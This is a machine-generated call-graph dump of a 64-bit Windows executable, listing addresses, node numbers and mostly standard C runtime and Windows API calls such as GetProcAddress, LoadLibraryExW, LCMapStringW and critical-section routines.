16680->16771 16681 7ff7a674473d 16685 7ff7a67443b8 _fread_nolock 11 API calls 16681->16685 16687 7ff7a67446b2 16682->16687 16683 7ff7a6744729 CloseHandle 16683->16687 16684 7ff7a6744713 CloseHandle 16684->16687 16690 7ff7a6744747 16685->16690 16687->16654 16690->16687 16692 7ff7a6744a40 16691->16692 16698 7ff7a6744a3b 16691->16698 16693 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16692->16693 16692->16698 16694 7ff7a6744a5b 16693->16694 16812 7ff7a674cb2c 16694->16812 16698->16657 16699 7ff7a674dfcc 16698->16699 16820 7ff7a674ddb8 16699->16820 16703 7ff7a674452e 16702->16703 16704 7ff7a6744552 16702->16704 16708 7ff7a6749e18 __free_lconv_mon 11 API calls 16703->16708 16711 7ff7a674453d 16703->16711 16705 7ff7a6744557 16704->16705 16706 7ff7a67445ac 16704->16706 16709 7ff7a674456c 16705->16709 16705->16711 16712 7ff7a6749e18 __free_lconv_mon 11 API calls 16705->16712 16830 7ff7a674e7f0 16706->16830 16708->16711 16713 7ff7a674cacc _fread_nolock 12 API calls 16709->16713 16711->16660 16711->16661 16712->16709 16713->16711 16725 7ff7a6744822 16724->16725 16726 7ff7a67448df 16724->16726 16727 7ff7a674484e GetFileInformationByHandle 16725->16727 16734 7ff7a6744bf4 21 API calls 16725->16734 16728 7ff7a6744909 16726->16728 16729 7ff7a67448e7 16726->16729 16730 7ff7a67448fa GetLastError 16727->16730 16731 7ff7a6744877 16727->16731 16733 7ff7a674492c PeekNamedPipe 16728->16733 16748 7ff7a67448ca 16728->16748 16729->16730 16732 7ff7a67448eb 16729->16732 16737 7ff7a67443b8 _fread_nolock 11 API calls 16730->16737 16735 7ff7a6744ab8 51 API calls 16731->16735 16736 7ff7a6744444 _get_daylight 11 API calls 16732->16736 16733->16748 16740 7ff7a674483c 16734->16740 16738 7ff7a6744882 16735->16738 16736->16748 16737->16748 16788 7ff7a674497c 16738->16788 16739 7ff7a673ad80 _wfindfirst32i64 8 API calls 16742 7ff7a674470c 16739->16742 16740->16727 16740->16748 16742->16683 16742->16684 16744 7ff7a674497c 10 API calls 16748->16739 16751 7ff7a6744d2e 16750->16751 
16752 7ff7a6744dc6 __vcrt_freefls 16751->16752 16753 7ff7a6744444 _get_daylight 11 API calls 16751->16753 16754 7ff7a673ad80 _wfindfirst32i64 8 API calls 16752->16754 16755 7ff7a6744d40 16753->16755 16756 7ff7a6744739 16754->16756 16757 7ff7a6744444 _get_daylight 11 API calls 16755->16757 16756->16680 16756->16681 16758 7ff7a6744d48 16757->16758 16759 7ff7a6745348 45 API calls 16758->16759 16760 7ff7a6744d5d 16759->16760 16761 7ff7a6744d6f 16760->16761 16762 7ff7a6744d65 16760->16762 16764 7ff7a6744444 _get_daylight 11 API calls 16761->16764 16763 7ff7a6744444 _get_daylight 11 API calls 16762->16763 16768 7ff7a6744d6a 16763->16768 16765 7ff7a6744d74 16764->16765 16765->16752 16766 7ff7a6744444 _get_daylight 11 API calls 16765->16766 16768->16752 16770 7ff7a6744db8 GetDriveTypeW 16768->16770 16770->16752 16772 7ff7a6744ae0 16771->16772 16780 7ff7a6744775 16772->16780 16795 7ff7a674e674 16772->16795 16781 7ff7a6744bf4 16780->16781 16782 7ff7a6744c0e 16781->16782 16783 7ff7a6744c45 16782->16783 16784 7ff7a6744c1e 16782->16784 16789 7ff7a6744998 16788->16789 16790 7ff7a67449a5 FileTimeToSystemTime 16788->16790 16789->16790 16792 7ff7a67449a0 16789->16792 16791 7ff7a67449b9 SystemTimeToTzSpecificLocalTime 16790->16791 16790->16792 16791->16792 16793 7ff7a673ad80 _wfindfirst32i64 8 API calls 16792->16793 16794 7ff7a6744891 16793->16794 16794->16744 16796 7ff7a674e6a5 16795->16796 16797 7ff7a674e681 16795->16797 16800 7ff7a674e6df 16796->16800 16801 7ff7a674e6fe 16796->16801 16797->16796 16798 7ff7a674e686 16797->16798 16799 7ff7a6744444 _get_daylight 11 API calls 16798->16799 16803 7ff7a6744444 _get_daylight 11 API calls 16800->16803 16805 7ff7a6744a1c 45 API calls 16801->16805 16813 7ff7a6744a7e 16812->16813 16814 7ff7a674cb41 16812->16814 16816 7ff7a674cb98 16813->16816 16814->16813 16815 7ff7a6752424 45 API calls 16814->16815 16815->16813 16817 7ff7a674cbad 16816->16817 16818 7ff7a674cbc0 16816->16818 16817->16818 16819 7ff7a6751790 45 API calls 16817->16819 
16818->16698 16819->16818 16821 7ff7a674de10 __vcrt_FlsAlloc 16820->16821 16822 7ff7a674de15 16820->16822 16821->16822 16823 7ff7a674de45 LoadLibraryExW 16821->16823 16824 7ff7a674df3a GetProcAddress 16821->16824 16829 7ff7a674dea4 LoadLibraryExW 16821->16829 16822->16657 16825 7ff7a674df1a 16823->16825 16826 7ff7a674de6a GetLastError 16823->16826 16824->16822 16828 7ff7a674df4b 16824->16828 16825->16824 16827 7ff7a674df31 FreeLibrary 16825->16827 16826->16821 16827->16824 16828->16822 16829->16821 16829->16825 16832 7ff7a674e7f9 MultiByteToWideChar 16830->16832 16834 7ff7a673f34d 16833->16834 16835 7ff7a673f35d 16833->16835 16836 7ff7a6744444 _get_daylight 11 API calls 16834->16836 16835->16647 16837 7ff7a673f352 16836->16837 16838 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16837->16838 16838->16835 16860 7ff7a674918d 16859->16860 16864 7ff7a673707a 16859->16864 16861 7ff7a6744444 _get_daylight 11 API calls 16860->16861 16862 7ff7a6749192 16861->16862 16863 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16862->16863 16863->16864 16865 7ff7a6746ef8 16864->16865 16866 7ff7a6746f01 16865->16866 16867 7ff7a6746f16 16865->16867 16868 7ff7a6744424 _fread_nolock 11 API calls 16866->16868 16870 7ff7a6744424 _fread_nolock 11 API calls 16867->16870 16873 7ff7a6746f0e 16867->16873 16869 7ff7a6746f06 16868->16869 16871 7ff7a6744444 _get_daylight 11 API calls 16869->16871 16872 7ff7a6746f51 16870->16872 16871->16873 16874 7ff7a6744444 _get_daylight 11 API calls 16872->16874 16873->15133 16875 7ff7a6746f59 16874->16875 16876 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16875->16876 16876->16873 16916 7ff7a67453fc 16915->16916 16917 7ff7a6745422 16916->16917 16919 7ff7a6745455 16916->16919 16918 7ff7a6744444 _get_daylight 11 API calls 16917->16918 16920 7ff7a6745427 16918->16920 16921 7ff7a6745468 16919->16921 16922 7ff7a674545b 16919->16922 16923 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16920->16923 16934 7ff7a674a0f8 16921->16934 16924 
7ff7a6744444 _get_daylight 11 API calls 16922->16924 16926 7ff7a6733d09 16923->16926 16924->16926 16926->15193 16947 7ff7a674f788 EnterCriticalSection 16934->16947 17295 7ff7a6747968 17294->17295 17298 7ff7a6747444 17295->17298 17297 7ff7a6747981 17297->15203 17299 7ff7a674748e 17298->17299 17300 7ff7a674745f 17298->17300 17308 7ff7a67442ec EnterCriticalSection 17299->17308 17301 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 17300->17301 17303 7ff7a674747f 17301->17303 17303->17297 17310 7ff7a673f0d1 17309->17310 17311 7ff7a673f0a3 17309->17311 17315 7ff7a673f0c3 17310->17315 17319 7ff7a67442ec EnterCriticalSection 17310->17319 17312 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 17311->17312 17312->17315 17315->15207 17321 7ff7a67312f8 17320->17321 17322 7ff7a67312c6 17320->17322 17324 7ff7a673f934 73 API calls 17321->17324 17323 7ff7a6733cb0 116 API calls 17322->17323 17325 7ff7a67312d6 17323->17325 17326 7ff7a673130a 17324->17326 17325->17321 17329 7ff7a67312de 17325->17329 17327 7ff7a673130e 17326->17327 17328 7ff7a673132f 17326->17328 17330 7ff7a67324d0 59 API calls 17327->17330 17334 7ff7a6731364 17328->17334 17335 7ff7a6731344 17328->17335 17331 7ff7a6732770 59 API calls 17329->17331 17332 7ff7a6731325 17330->17332 17333 7ff7a67312ee 17331->17333 17332->15218 17333->15218 17337 7ff7a673137e 17334->17337 17341 7ff7a6731395 17334->17341 17336 7ff7a67324d0 59 API calls 17335->17336 17344 7ff7a673135f __vcrt_freefls 17336->17344 17338 7ff7a6731050 98 API calls 17337->17338 17338->17344 17339 7ff7a673f5fc _fread_nolock 53 API calls 17339->17341 17340 7ff7a6731421 17340->15218 17341->17339 17343 7ff7a67313de 17341->17343 17341->17344 17342 7ff7a673f2ac 74 API calls 17342->17340 17345 7ff7a67324d0 59 API calls 17343->17345 17344->17340 17344->17342 17345->17344 17347 7ff7a6731b30 49 API calls 17346->17347 17348 7ff7a6733d60 17347->17348 17348->15220 17350 7ff7a67316aa 17349->17350 17351 7ff7a6731666 17349->17351 17350->15223 17351->17350 17352 
7ff7a6732770 59 API calls 17351->17352 17353 7ff7a67316be 17352->17353 17353->15223 17355 7ff7a6737a30 57 API calls 17354->17355 17356 7ff7a67371c7 LoadLibraryExW 17355->17356 17357 7ff7a67371e4 __vcrt_freefls 17356->17357 17357->15244 17359 7ff7a6734970 17358->17359 17360 7ff7a6731b30 49 API calls 17359->17360 17361 7ff7a67349a2 17360->17361 17362 7ff7a67349ab 17361->17362 17365 7ff7a67349cb 17361->17365 17363 7ff7a6732770 59 API calls 17362->17363 17367 7ff7a67349c1 17363->17367 17364 7ff7a6734a22 17366 7ff7a6733d30 49 API calls 17364->17366 17365->17364 17368 7ff7a6733d30 49 API calls 17365->17368 17369 7ff7a6734a3b 17366->17369 17371 7ff7a673ad80 _wfindfirst32i64 8 API calls 17367->17371 17370 7ff7a67349ec 17368->17370 17372 7ff7a6734a59 17369->17372 17376 7ff7a6732770 59 API calls 17369->17376 17373 7ff7a6734a0a 17370->17373 17378 7ff7a6732770 59 API calls 17370->17378 17375 7ff7a67330be 17371->17375 17377 7ff7a67371b0 58 API calls 17372->17377 17443 7ff7a6733c40 17373->17443 17375->15323 17386 7ff7a6734ce0 17375->17386 17376->17372 17380 7ff7a6734a66 17377->17380 17378->17373 17381 7ff7a6734a8d 17380->17381 17382 7ff7a6734a6b 17380->17382 17449 7ff7a6733df0 GetProcAddress 17381->17449 17385 7ff7a6732620 57 API calls 17382->17385 17384 7ff7a67371b0 58 API calls 17384->17364 17385->17367 17387 7ff7a6736990 61 API calls 17386->17387 17389 7ff7a6734cf5 17387->17389 17388 7ff7a6734d10 17390 7ff7a6737a30 57 API calls 17388->17390 17389->17388 17391 7ff7a6732880 59 API calls 17389->17391 17392 7ff7a6734d54 17390->17392 17391->17388 17393 7ff7a6734d59 17392->17393 17394 7ff7a6734d70 17392->17394 17395 7ff7a6732770 59 API calls 17393->17395 17397 7ff7a6737a30 57 API calls 17394->17397 17396 7ff7a6734d65 17395->17396 17396->15325 17398 7ff7a6734da5 17397->17398 17401 7ff7a6731b30 49 API calls 17398->17401 17412 7ff7a6734daa __vcrt_freefls 17398->17412 17399 7ff7a6732770 59 API calls 17400 7ff7a6734f51 17399->17400 17400->15325 17402 7ff7a6734e27 17401->17402 17403 
7ff7a6734e2e 17402->17403 17404 7ff7a6734e53 17402->17404 17406 7ff7a6732770 59 API calls 17403->17406 17405 7ff7a6737a30 57 API calls 17404->17405 17408 7ff7a6734e6c 17405->17408 17407 7ff7a6734e43 17406->17407 17407->15325 17408->17412 17556 7ff7a6734ac0 17408->17556 17412->17399 17413 7ff7a6734f3a 17412->17413 17413->15325 17415 7ff7a67346f7 17414->17415 17415->17415 17416 7ff7a6734720 17415->17416 17420 7ff7a6734737 __vcrt_freefls 17415->17420 17417 7ff7a6732770 59 API calls 17416->17417 17418 7ff7a673472c 17417->17418 17418->15327 17419 7ff7a673481b 17419->15327 17420->17419 17421 7ff7a6731780 59 API calls 17420->17421 17422 7ff7a67312b0 122 API calls 17420->17422 17423 7ff7a6732770 59 API calls 17420->17423 17421->17420 17422->17420 17423->17420 17425 7ff7a6734947 17424->17425 17426 7ff7a673485b 17424->17426 17425->15329 17426->17425 17426->17426 17427 7ff7a6731780 59 API calls 17426->17427 17428 7ff7a6732770 59 API calls 17426->17428 17427->17426 17428->17426 17444 7ff7a6733c4a 17443->17444 17445 7ff7a6737a30 57 API calls 17444->17445 17446 7ff7a6733c72 17445->17446 17447 7ff7a673ad80 _wfindfirst32i64 8 API calls 17446->17447 17448 7ff7a6733c9a 17447->17448 17448->17364 17448->17384 17450 7ff7a6733e18 17449->17450 17451 7ff7a6733e3b GetProcAddress 17449->17451 17453 7ff7a6732620 57 API calls 17450->17453 17451->17450 17452 7ff7a6733e60 GetProcAddress 17451->17452 17452->17450 17454 7ff7a6733e85 GetProcAddress 17452->17454 17455 7ff7a6733e2b 17453->17455 17454->17450 17456 7ff7a6733ead GetProcAddress 17454->17456 17455->17367 17456->17450 17457 7ff7a6733ed5 GetProcAddress 17456->17457 17457->17450 17458 7ff7a6733efd GetProcAddress 17457->17458 17459 7ff7a6733f19 17458->17459 17460 7ff7a6733f25 GetProcAddress 17458->17460 17459->17460 17461 7ff7a6733f4d GetProcAddress 17460->17461 17462 7ff7a6733f41 17460->17462 17463 7ff7a6733f69 17461->17463 17462->17461 17464 7ff7a6733f7d GetProcAddress 17463->17464 17465 7ff7a6733fa5 GetProcAddress 17463->17465 
17464->17465 17466 7ff7a6733f99 17464->17466 17467 7ff7a6733fcd GetProcAddress 17465->17467 17468 7ff7a6733fc1 17465->17468 17466->17465 17469 7ff7a6733fe9 17467->17469 17470 7ff7a6733ff5 GetProcAddress 17467->17470 17468->17467 17469->17470 17471 7ff7a673401d GetProcAddress 17470->17471 17472 7ff7a6734011 17470->17472 17473 7ff7a6734039 17471->17473 17474 7ff7a6734045 GetProcAddress 17471->17474 17472->17471 17473->17474 17475 7ff7a673406d GetProcAddress 17474->17475 17476 7ff7a6734061 17474->17476 17477 7ff7a6734089 17475->17477 17478 7ff7a6734095 GetProcAddress 17475->17478 17476->17475 17477->17478 17560 7ff7a6734ada 17556->17560 17557 7ff7a673ad80 _wfindfirst32i64 8 API calls 17558 7ff7a6734cb0 17557->17558 17559 7ff7a6731780 59 API calls 17559->17560 17560->17559 17562 7ff7a6734bf3 17560->17562 17565 7ff7a6734cc9 17560->17565 17582 7ff7a6734c91 17560->17582 17590 7ff7a67456d0 17560->17590 17563 7ff7a6749184 _fread_nolock 37 API calls 17562->17563 17562->17582 17564 7ff7a6734c0a 17563->17564 17567 7ff7a6732770 59 API calls 17565->17567 17567->17582 17582->17557 17591 7ff7a6745700 17590->17591 17619 7ff7a67454d4 17591->17619 17688 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17687->17688 17689 7ff7a67490e1 17688->17689 17690 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17689->17690 17691 7ff7a6749101 17690->17691 17915 7ff7a6756fa0 17918 7ff7a6751730 17915->17918 17919 7ff7a675173d 17918->17919 17920 7ff7a6751782 17918->17920 17924 7ff7a674a6f4 17919->17924 17925 7ff7a674a705 FlsGetValue 17924->17925 17926 7ff7a674a720 FlsSetValue 17924->17926 17927 7ff7a674a71a 17925->17927 17929 7ff7a674a712 17925->17929 17928 7ff7a674a72d 17926->17928 17926->17929 17927->17926 17932 7ff7a674dd40 _get_daylight 11 API calls 17928->17932 17930 7ff7a674a718 17929->17930 17931 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17929->17931 17944 7ff7a6751404 17930->17944 17933 7ff7a674a795 17931->17933 17934 7ff7a674a73c 
17932->17934 17935 7ff7a674a75a FlsSetValue 17934->17935 17936 7ff7a674a74a FlsSetValue 17934->17936 17937 7ff7a674a778 17935->17937 17938 7ff7a674a766 FlsSetValue 17935->17938 17939 7ff7a674a753 17936->17939 17941 7ff7a674a3c4 _get_daylight 11 API calls 17937->17941 17938->17939 17940 7ff7a6749e18 __free_lconv_mon 11 API calls 17939->17940 17940->17929 17942 7ff7a674a780 17941->17942 17943 7ff7a6749e18 __free_lconv_mon 11 API calls 17942->17943 17943->17930 17967 7ff7a6751674 17944->17967 17946 7ff7a6751439 17982 7ff7a6751104 17946->17982 17949 7ff7a674cacc _fread_nolock 12 API calls 17950 7ff7a6751467 17949->17950 17951 7ff7a675146f 17950->17951 17954 7ff7a675147e 17950->17954 17952 7ff7a6749e18 __free_lconv_mon 11 API calls 17951->17952 17953 7ff7a6751456 17952->17953 17953->17920 17954->17954 17989 7ff7a67517ac 17954->17989 17957 7ff7a675157a 17958 7ff7a6744444 _get_daylight 11 API calls 17957->17958 17959 7ff7a675157f 17958->17959 17962 7ff7a6749e18 __free_lconv_mon 11 API calls 17959->17962 17960 7ff7a67515d5 17961 7ff7a675163c 17960->17961 18000 7ff7a6750f34 17960->18000 17965 7ff7a6749e18 __free_lconv_mon 11 API calls 17961->17965 17962->17953 17963 7ff7a6751594 17963->17960 17966 7ff7a6749e18 __free_lconv_mon 11 API calls 17963->17966 17965->17953 17966->17960 17968 7ff7a6751697 17967->17968 17969 7ff7a67516a1 17968->17969 18015 7ff7a674f788 EnterCriticalSection 17968->18015 17971 7ff7a6751713 17969->17971 17974 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17969->17974 17971->17946 17976 7ff7a675172b 17974->17976 17978 7ff7a6751782 17976->17978 17979 7ff7a674a6f4 50 API calls 17976->17979 17978->17946 17980 7ff7a675176c 17979->17980 17981 7ff7a6751404 65 API calls 17980->17981 17981->17978 17983 7ff7a6744a1c 45 API calls 17982->17983 17984 7ff7a6751118 17983->17984 17985 7ff7a6751124 GetOEMCP 17984->17985 17986 7ff7a6751136 17984->17986 17988 7ff7a675114b 17985->17988 17987 7ff7a675113b GetACP 17986->17987 17986->17988 17987->17988 
17988->17949 17988->17953 17990 7ff7a6751104 47 API calls 17989->17990 17992 7ff7a67517d9 17990->17992 17991 7ff7a675192f 17993 7ff7a673ad80 _wfindfirst32i64 8 API calls 17991->17993 17992->17991 17994 7ff7a6751816 IsValidCodePage 17992->17994 17997 7ff7a6751830 __scrt_get_show_window_mode 17992->17997 17995 7ff7a6751571 17993->17995 17994->17991 17996 7ff7a6751827 17994->17996 17995->17957 17995->17963 17996->17997 17998 7ff7a6751856 GetCPInfo 17996->17998 18016 7ff7a675121c 17997->18016 17998->17991 17998->17997 18087 7ff7a674f788 EnterCriticalSection 18000->18087 18017 7ff7a6751259 GetCPInfo 18016->18017 18018 7ff7a675134f 18016->18018 18017->18018 18024 7ff7a675126c 18017->18024 18019 7ff7a673ad80 _wfindfirst32i64 8 API calls 18018->18019 18020 7ff7a67513ee 18019->18020 18020->17991 18027 7ff7a6751f60 18024->18027 18026 7ff7a6756f04 54 API calls 18026->18018 18028 7ff7a6744a1c 45 API calls 18027->18028 18029 7ff7a6751fa2 18028->18029 18030 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18029->18030 18032 7ff7a6751fd8 18030->18032 18031 7ff7a6751fdf 18034 7ff7a673ad80 _wfindfirst32i64 8 API calls 18031->18034 18032->18031 18033 7ff7a674cacc _fread_nolock 12 API calls 18032->18033 18036 7ff7a675209c 18032->18036 18038 7ff7a6752008 __scrt_get_show_window_mode 18032->18038 18033->18038 18035 7ff7a67512e3 18034->18035 18042 7ff7a6756f04 18035->18042 18036->18031 18037 7ff7a6749e18 __free_lconv_mon 11 API calls 18036->18037 18037->18031 18038->18036 18039 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18038->18039 18040 7ff7a675207e 18039->18040 18040->18036 18041 7ff7a6752082 GetStringTypeW 18040->18041 18041->18036 18043 7ff7a6744a1c 45 API calls 18042->18043 18044 7ff7a6756f29 18043->18044 18047 7ff7a6756bd0 18044->18047 18048 7ff7a6756c11 18047->18048 18049 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18048->18049 18052 7ff7a6756c5b 18049->18052 18050 7ff7a6756ed9 18051 7ff7a673ad80 _wfindfirst32i64 8 API calls 18050->18051 18053 7ff7a6751316 18051->18053 
18052->18050 18054 7ff7a674cacc _fread_nolock 12 API calls 18052->18054 18055 7ff7a6756d91 18052->18055 18057 7ff7a6756c93 18052->18057 18053->18026 18054->18057 18055->18050 18056 7ff7a6749e18 __free_lconv_mon 11 API calls 18055->18056 18056->18050 18057->18055 18058 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18057->18058 18059 7ff7a6756d06 18058->18059 18059->18055 18078 7ff7a674e18c 18059->18078 18062 7ff7a6756d51 18062->18055 18064 7ff7a674e18c __crtLCMapStringW 6 API calls 18062->18064 18063 7ff7a6756da2 18065 7ff7a674cacc _fread_nolock 12 API calls 18063->18065 18066 7ff7a6756e74 18063->18066 18068 7ff7a6756dc0 18063->18068 18064->18055 18065->18068 18066->18055 18067 7ff7a6749e18 __free_lconv_mon 11 API calls 18066->18067 18067->18055 18068->18055 18069 7ff7a674e18c __crtLCMapStringW 6 API calls 18068->18069 18070 7ff7a6756e40 18069->18070 18070->18066 18071 7ff7a6756e76 18070->18071 18072 7ff7a6756e60 18070->18072 18074 7ff7a674f0b8 WideCharToMultiByte 18071->18074 18073 7ff7a674f0b8 WideCharToMultiByte 18072->18073 18075 7ff7a6756e6e 18073->18075 18074->18075 18075->18066 18076 7ff7a6756e8e 18075->18076 18076->18055 18077 7ff7a6749e18 __free_lconv_mon 11 API calls 18076->18077 18077->18055 18079 7ff7a674ddb8 __crtLCMapStringW 5 API calls 18078->18079 18080 7ff7a674e1ca 18079->18080 18083 7ff7a674e1d2 18080->18083 18084 7ff7a674e278 18080->18084 18082 7ff7a674e23b LCMapStringW 18082->18083 18083->18055 18083->18062 18083->18063 18085 7ff7a674ddb8 __crtLCMapStringW 5 API calls 18084->18085 18086 7ff7a674e2a6 __crtLCMapStringW 18085->18086 18086->18082 18108 7ff7a674a4a0 18109 7ff7a674a4a5 18108->18109 18113 7ff7a674a4ba 18108->18113 18114 7ff7a674a4c0 18109->18114 18115 7ff7a674a502 18114->18115 18118 7ff7a674a50a 18114->18118 18116 7ff7a6749e18 __free_lconv_mon 11 API calls 18115->18116 18116->18118 18117 7ff7a6749e18 __free_lconv_mon 11 API calls 18119 7ff7a674a517 18117->18119 18118->18117 18120 7ff7a6749e18 __free_lconv_mon 11 API calls 18119->18120 
18121 7ff7a674a524 18120->18121 18122 7ff7a6749e18 __free_lconv_mon 11 API calls 18121->18122 18123 7ff7a674a531 18122->18123 18124 7ff7a6749e18 __free_lconv_mon 11 API calls 18123->18124 18125 7ff7a674a53e 18124->18125 18126 7ff7a6749e18 __free_lconv_mon 11 API calls 18125->18126 18127 7ff7a674a54b 18126->18127 18128 7ff7a6749e18 __free_lconv_mon 11 API calls 18127->18128 18129 7ff7a674a558 18128->18129 18130 7ff7a6749e18 __free_lconv_mon 11 API calls 18129->18130 18131 7ff7a674a565 18130->18131 18132 7ff7a6749e18 __free_lconv_mon 11 API calls 18131->18132 18133 7ff7a674a575 18132->18133 18134 7ff7a6749e18 __free_lconv_mon 11 API calls 18133->18134 18135 7ff7a674a585 18134->18135 18140 7ff7a674a364 18135->18140 18154 7ff7a674f788 EnterCriticalSection 18140->18154 18231 7ff7a673b0b0 18232 7ff7a673b0c0 18231->18232 18248 7ff7a674579c 18232->18248 18234 7ff7a673b0cc 18254 7ff7a673b3b8 18234->18254 18236 7ff7a673b69c 7 API calls 18237 7ff7a673b165 18236->18237 18238 7ff7a673b0e4 _RTC_Initialize 18246 7ff7a673b139 18238->18246 18259 7ff7a673b568 18238->18259 18240 7ff7a673b0f9 18262 7ff7a6747e6c 18240->18262 18246->18236 18247 7ff7a673b155 18246->18247 18249 7ff7a67457ad 18248->18249 18250 7ff7a67457b5 18249->18250 18251 7ff7a6744444 _get_daylight 11 API calls 18249->18251 18250->18234 18252 7ff7a67457c4 18251->18252 18253 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 18252->18253 18253->18250 18255 7ff7a673b3c9 18254->18255 18258 7ff7a673b3ce __scrt_release_startup_lock 18254->18258 18256 7ff7a673b69c 7 API calls 18255->18256 18255->18258 18257 7ff7a673b442 18256->18257 18258->18238 18287 7ff7a673b52c 18259->18287 18261 7ff7a673b571 18261->18240 18263 7ff7a6747e8c 18262->18263 18285 7ff7a673b105 18262->18285 18264 7ff7a6747eaa GetModuleFileNameW 18263->18264 18265 7ff7a6747e94 18263->18265 18269 7ff7a6747ed5 18264->18269 18266 7ff7a6744444 _get_daylight 11 API calls 18265->18266 18267 7ff7a6747e99 18266->18267 18268 7ff7a6749db0 _invalid_parameter_noinfo 37 API 
calls 18267->18268 18268->18285 18270 7ff7a6747e0c 11 API calls 18269->18270 18271 7ff7a6747f15 18270->18271 18272 7ff7a6747f1d 18271->18272 18273 7ff7a6747f35 18271->18273 18274 7ff7a6744444 _get_daylight 11 API calls 18272->18274 18277 7ff7a6747f57 18273->18277 18279 7ff7a6747f9c 18273->18279 18280 7ff7a6747f83 18273->18280 18275 7ff7a6747f22 18274->18275 18276 7ff7a6749e18 __free_lconv_mon 11 API calls 18275->18276 18276->18285 18278 7ff7a6749e18 __free_lconv_mon 11 API calls 18277->18278 18278->18285 18283 7ff7a6749e18 __free_lconv_mon 11 API calls 18279->18283 18281 7ff7a6749e18 __free_lconv_mon 11 API calls 18280->18281 18282 7ff7a6747f8c 18281->18282 18284 7ff7a6749e18 __free_lconv_mon 11 API calls 18282->18284 18283->18277 18284->18285 18285->18246 18286 7ff7a673b63c InitializeSListHead 18285->18286 18288 7ff7a673b546 18287->18288 18290 7ff7a673b53f 18287->18290 18291 7ff7a6748eec 18288->18291 18290->18261 18294 7ff7a6748b28 18291->18294 18301 7ff7a674f788 EnterCriticalSection 18294->18301 17692 7ff7a67487b9 17693 7ff7a67490d8 45 API calls 17692->17693 17694 7ff7a67487be 17693->17694 17695 7ff7a67487e5 GetModuleHandleW 17694->17695 17696 7ff7a674882f 17694->17696 17695->17696 17702 7ff7a67487f2 17695->17702 17704 7ff7a67486bc 17696->17704 17702->17696 17718 7ff7a67488e0 GetModuleHandleExW 17702->17718 17724 7ff7a674f788 EnterCriticalSection 17704->17724 17719 7ff7a674893d 17718->17719 17720 7ff7a6748914 GetProcAddress 17718->17720 17722 7ff7a6748949 17719->17722 17723 7ff7a6748942 FreeLibrary 17719->17723 17721 7ff7a6748926 17720->17721 17721->17719 17722->17696 17723->17722 18956 7ff7a6748a50 18959 7ff7a67489d0 18956->18959 18966 7ff7a674f788 EnterCriticalSection 18959->18966 14685 7ff7a674e8dc 14686 7ff7a674eace 14685->14686 14688 7ff7a674e91e _isindst 14685->14688 14737 7ff7a6744444 14686->14737 14688->14686 14691 7ff7a674e99e _isindst 14688->14691 14706 7ff7a67553b4 14691->14706 14696 7ff7a674eafa 14749 7ff7a6749dd0 IsProcessorFeaturePresent 
14696->14749 14703 7ff7a674e9fb 14705 7ff7a674eabe 14703->14705 14730 7ff7a67553f8 14703->14730 14740 7ff7a673ad80 14705->14740 14707 7ff7a67553c3 14706->14707 14708 7ff7a674e9bc 14706->14708 14753 7ff7a674f788 EnterCriticalSection 14707->14753 14712 7ff7a67547b8 14708->14712 14713 7ff7a674e9d1 14712->14713 14714 7ff7a67547c1 14712->14714 14713->14696 14718 7ff7a67547e8 14713->14718 14715 7ff7a6744444 _get_daylight 11 API calls 14714->14715 14716 7ff7a67547c6 14715->14716 14754 7ff7a6749db0 14716->14754 14719 7ff7a67547f1 14718->14719 14723 7ff7a674e9e2 14718->14723 14720 7ff7a6744444 _get_daylight 11 API calls 14719->14720 14721 7ff7a67547f6 14720->14721 14722 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 14721->14722 14722->14723 14723->14696 14724 7ff7a6754818 14723->14724 14725 7ff7a674e9f3 14724->14725 14726 7ff7a6754821 14724->14726 14725->14696 14725->14703 14727 7ff7a6744444 _get_daylight 11 API calls 14726->14727 14728 7ff7a6754826 14727->14728 14729 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 14728->14729 14729->14725 14835 7ff7a674f788 EnterCriticalSection 14730->14835 14836 7ff7a674a798 GetLastError 14737->14836 14739 7ff7a674444d 14739->14705 14741 7ff7a673ad89 14740->14741 14742 7ff7a673ad94 14741->14742 14743 7ff7a673ae40 IsProcessorFeaturePresent 14741->14743 14744 7ff7a673ae58 14743->14744 14853 7ff7a673b034 RtlCaptureContext 14744->14853 14750 7ff7a6749de3 14749->14750 14858 7ff7a6749ae4 14750->14858 14756 7ff7a6749c48 14754->14756 14757 7ff7a6749c73 14756->14757 14760 7ff7a6749ce4 14757->14760 14759 7ff7a6749c9a 14768 7ff7a6749a2c 14760->14768 14763 7ff7a6749d1f 14763->14759 14766 7ff7a6749dd0 _wfindfirst32i64 17 API calls 14767 7ff7a6749daf 14766->14767 14769 7ff7a6749a48 GetLastError 14768->14769 14770 7ff7a6749a83 14768->14770 14771 7ff7a6749a58 14769->14771 14770->14763 14774 7ff7a6749a98 14770->14774 14777 7ff7a674a860 14771->14777 14775 7ff7a6749acc 14774->14775 14776 7ff7a6749ab4 GetLastError SetLastError 14774->14776 
